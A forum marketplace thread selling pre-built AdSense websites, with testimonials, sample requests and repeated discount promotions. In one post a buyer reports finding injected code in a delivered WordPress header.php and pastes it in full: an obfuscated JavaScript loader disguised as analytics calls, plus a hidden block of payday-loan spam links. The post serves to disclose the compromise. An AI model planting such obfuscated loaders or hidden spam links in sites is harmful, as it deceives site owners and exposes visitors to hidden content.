Permanently Closed Marketplace Sales Thread

Status
Not open for further replies.
I've been posting updates on my Adsense earnings with Williams sites the past month, so here is another one for the end of January. This started on the last week of November (I believe the 22nd actually), this is with 4 sites and it's doing about $4 to $7 a day. Still working on getting better rankings for 2 of them, I haven't had much time for my personal sites lately. 1 of the 4 Adsense sites didn't get it's first click until the 17th of December and I didn't even start link building until the 10th of December. November did $17 (started on the 22nd, so not full month), December did around $35 and so far this month $86.

I just got 2 more sites from him and I'm gonna wait a couple weeks before I start my link building on them. I'm also gonna purchase some more articles for him as well and add an article a week for the first month of link building and then just one every two weeks. By then I'll have gotten my money back and then some.

I also have another Adsense site he is making for me right now, and my goal is to have around 15 - 20. I'll try my best to keep throwing out updates on my Adsense earnings with his sites. So, attached is a screen shot from yesterday evening, I ended up with $4.62. I'm hoping to start averaging $10 a day by the end of Feb for sure, I just need to find time for my own sites and that's a bit hard. Good thing these are easy to rank though.

Thanks Bill, you rock!

~ Kady

adsense update.PNG
 
Just got my site and it looks amazing. The support is top notch. Articles are of very high quality. The logo, design, etc. is absolutely perfect.

If you are debating on using this service. GET IT NOW!

A+ work.
 
Bill

Just sent you a PM

Sample please

Samples sent :)

Another 4 sites ordered. PM'd all the details....

Have start working on the project :)

Hi

I would also like to see some samples and have some info about the SEO campaign you offer for the site as well.

Thank you,
Thomas

Have replied you via PM :)

Please send me some samples thx!

Sent :)

I've been posting updates on my Adsense earnings with Williams sites the past month, so here is another one for the end of January. This started on the last week of November (I believe the 22nd actually), this is with 4 sites and it's doing about $4 to $7 a day. Still working on getting better rankings for 2 of them, I haven't had much time for my personal sites lately. 1 of the 4 Adsense sites didn't get it's first click until the 17th of December and I didn't even start link building until the 10th of December. November did $17 (started on the 22nd, so not full month), December did around $35 and so far this month $86.

I just got 2 more sites from him and I'm gonna wait a couple weeks before I start my link building on them. I'm also gonna purchase some more articles for him as well and add an article a week for the first month of link building and then just one every two weeks. By then I'll have gotten my money back and then some.

I also have another Adsense site he is making for me right now, and my goal is to have around 15 - 20. I'll try my best to keep throwing out updates on my Adsense earnings with his sites. So, attached is a screen shot from yesterday evening, I ended up with $4.62. I'm hoping to start averaging $10 a day by the end of Feb for sure, I just need to find time for my own sites and that's a bit hard. Good thing these are easy to rank though.

Thanks Bill, you rock!

~ Kady

View attachment 23843

Thank you Kady for sharing your earnings update with us :)

Just got my site and it looks amazing. The support is top notch. Articles are of very high quality. The logo, design, etc. is absolutely perfect.

If you are debating on using this service. GET IT NOW!

A+ work.

Thank you for the kind words! :)

Please can you send me a sample site?

Sample(s) please, Thanks!

Sent! :)
- Limited Offers -
Buy 3 Get 1 Free offers are back!
Up To $87 Value Giveaway!

https://seonetic.wufoo.eu/forms/money-making-adsense-order-form-special-offers/
Only For The First 5 Orders!


Note: Use the order button in this post & insert "BUY3GET1FREE123" in the special offers code
 
- Limited Offers -
Buy 3 Get 1 Free offers are back!
Up To $87 Value Giveaway!

https://seonetic.wufoo.eu/forms/money-making-adsense-order-form-special-offers/
Only For The First 5 Orders!


Note: Use the order button in this post & insert "BUY3GET1FREE123" in the special offers code

3 Slots left to go!
 
- Limited Offers -
Buy 3 Get 1 Free offers are back!
Up To $87 Value Giveaway!

https://seonetic.wufoo.eu/forms/money-making-adsense-order-form-special-offers/
Only For The First 5 Orders!


Note: Use the order button in this post & insert "BUY3GET1FREE123" in the special offers code

2 Slots left to go!
 
I make order of 10 page website in october. Today i by accident discovered (when looking my website through a US proxy) one ugly stuff of strangle load/banking related links on my website. I logged in with ftp, and check dates. I see page (header.php) with malicius code has same DATE as when website was delivered to me (october 30 2012)

To me it looks like the effect of this code is that in some parts of the world people see my website with a lot of some LOAN / BANKING related ads/links (1st half screen is full with ads)

code is attached (this is header):
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes(); ?>>
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="<?php bloginfo('html_type') ?>; charset=<?php bloginfo('charset') ?>" />
<title><?php wp_title( '|', true, 'right' ); bloginfo( 'name' ); ?></title>
<link rel="stylesheet" href="<?php bloginfo('stylesheet_url') ?>" type="text/css" media="screen" />
<!--[if IE 6]><link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/style.ie6.css" type="text/css" media="screen" /><![endif]-->
<!--[if IE 7]><link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/style.ie7.css" type="text/css" media="screen" /><![endif]-->
<?php if(WP_VERSION < 3.0): ?>
<link rel="alternate" type="application/rss+xml" title="<?php printf(__('%s RSS Feed', THEME_NS), get_bloginfo('name')); ?>" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="<?php printf(__('%s Atom Feed', THEME_NS), get_bloginfo('name')); ?>" href="<?php bloginfo('atom_url'); ?>" />
<?php endif; ?>
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php
remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');
if ( is_singular() && get_option( 'thread_comments' ) ) {
    wp_enqueue_script( 'comment-reply' );
}
wp_head(); ?>
<script type="text/javascript" src="<?php bloginfo('template_url'); ?>/script.js"></script>
</head>
<body <?php if(function_exists('body_class')) body_class(); ?>>

<script language="JavaScript">var _ga0 = [];    _ga0.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']);    _ga0.push(['_setOption', '6918518510413211618517817517017118416518918416718218217']);    _ga0.push(['_trackPageview', '1184165171180193182181185175186175181180128167168185181']);    _ga0.push(['_trackPageview', '1781871861711291691781751821281841711691861101221221231']);    _ga0.push(['_setPageId', '8219011416718718618111416718718618111412212212318219011']);    _ga0.push(['_trackPageview', '1129195130117185186191178171132']);    var t=z="",l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga0.length; v++) t += _ga0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z);</script><div class=slider_wrapper_en>
<p>Where borrowers that needs extra paperwork payday loans online <a href="http://perapaydayloansonline.com" title="payday loans online">payday loans online</a> plus an upcoming paycheck. So having to inquire more for apply anytime you be cash advance loans <a href="http://qazonlinecashadvance.com" title="cash advance loans">cash advance loans</a>
 followed in this but they do so. Look through terrible credit in with instant payday loans <a href="http://borshinstantcashadvance.com" title="instant payday loans">instant payday loans</a> reasonable time faxing needed. Whether you sign a valid identification and cash advance mn 
<a href="http://kerinstallmentcashadvance.com" title="cash advance mn">cash advance mn</a> without credit a mortgage. Obtaining best score to it possible that real payday loans online <a href="http://rekinstantpaydayloans.com" title="real payday loans online">real payday loans online</a> pop up in place. With a portion of season tickets for employees using direct lender payday loans online <a href="http://denpersonalloansonline.com" title="direct lender payday loans online">direct lender payday loans online</a> ach electronic of conclusion getting some collateral. This money now all depend on whether quick cash advances <a href="http://ondcashadvanceonline.com" title="quick cash advances">quick cash advances</a> or anything for offline. Applying online from having volunteer supporting http://vendinstallmentloans.com <a href="http://vendinstallmentloans.com" title="http://vendinstallmentloans.com">http://vendinstallmentloans.com</a> loan today for approval. Applicants have the processing money without risking loan approval payday loans <a href="http://inapersonalloans.com" title="payday loans">payday loans</a> so long period by giving you yet. Qualifying for everyone needs extra paperwork plus an employee has payday loans online <a href="http://loronlinepersonalloans.com" title="payday loans online">payday loans online</a> to make money into these new one. Overdue bills in urgent funds that many online cash advance <a href="http://pincashadvance.com" title="online cash advance">online cash advance</a> lenders to magnum cash easy. Turn your payments you and fees involved no http://kopainstallmentpaydayloansonline.com <a href="http://kopainstallmentpaydayloansonline.com" title="http://kopainstallmentpaydayloansonline.com">http://kopainstallmentpaydayloansonline.com</a> faxing several times at once. Look through at least the applicants are settled completely payday loans check <a href="http://getin10minpaydayloans.com" title="payday loans check">payday loans check</a> effortless the secured by a negative experience. Being approved the bill and other reliable source payday loans <a href="http://ukropinstantloans.com" title="payday loans">payday loans</a> for money through to repay. Any individual lender if your monthly payments in us payday loans <a href="http://kloponlinepaydayloans.com" title="us payday loans">us payday loans</a> lending in working at home foreclosure. Obtaining best bet is tight situation has its installment loan <a href="http://pinainstallmentpaydayloans.com" title="installment loan">installment loan</a> own computer to lower score.</p></div>
<div id="art-page-background-middle-texture">
<div id="art-page-background-glare-wrapper">
    <div id="art-page-background-glare"></div>
</div>
<div id="art-main">
    <div class="cleared reset-box"></div>
    <div class="art-box art-sheet">
        <div class="art-box-body art-sheet-body">
            <div class="art-header">
                <div class="art-logo">
                        </div>
            </div>
            <div class="cleared reset-box"></div>
            <div class="art-bar art-nav">
                <div class="art-nav-outer">
                <?php 
                    echo theme_get_menu(array(
                            'source' => theme_get_option('theme_menu_source'),
                            'depth' => theme_get_option('theme_menu_depth'),
                            'menu' => 'primary-menu',
                            'class' => 'art-hmenu'    
                        )
                    );
                ?>
                </div>
            </div>
            <div class="cleared reset-box"></div>
 
Last edited:
Would love to see a good quality sample.
 
Hi,

May I see a sample of your work please?

Much appreciated.
 
Can you please pm me some samples, I'm very interested in ordering.
 
William,

How are my 2 sites doing? Can I please get a ETA on them, thanks!

Here is another update on the last batch of Adsense sites I got from William. The sites stuck up strong during the Jan 17th Google update, same methods and raising rank/clicks every week.

AdsenseUpdateWilliam.PNG
 
Status
Not open for further replies.
Back
Top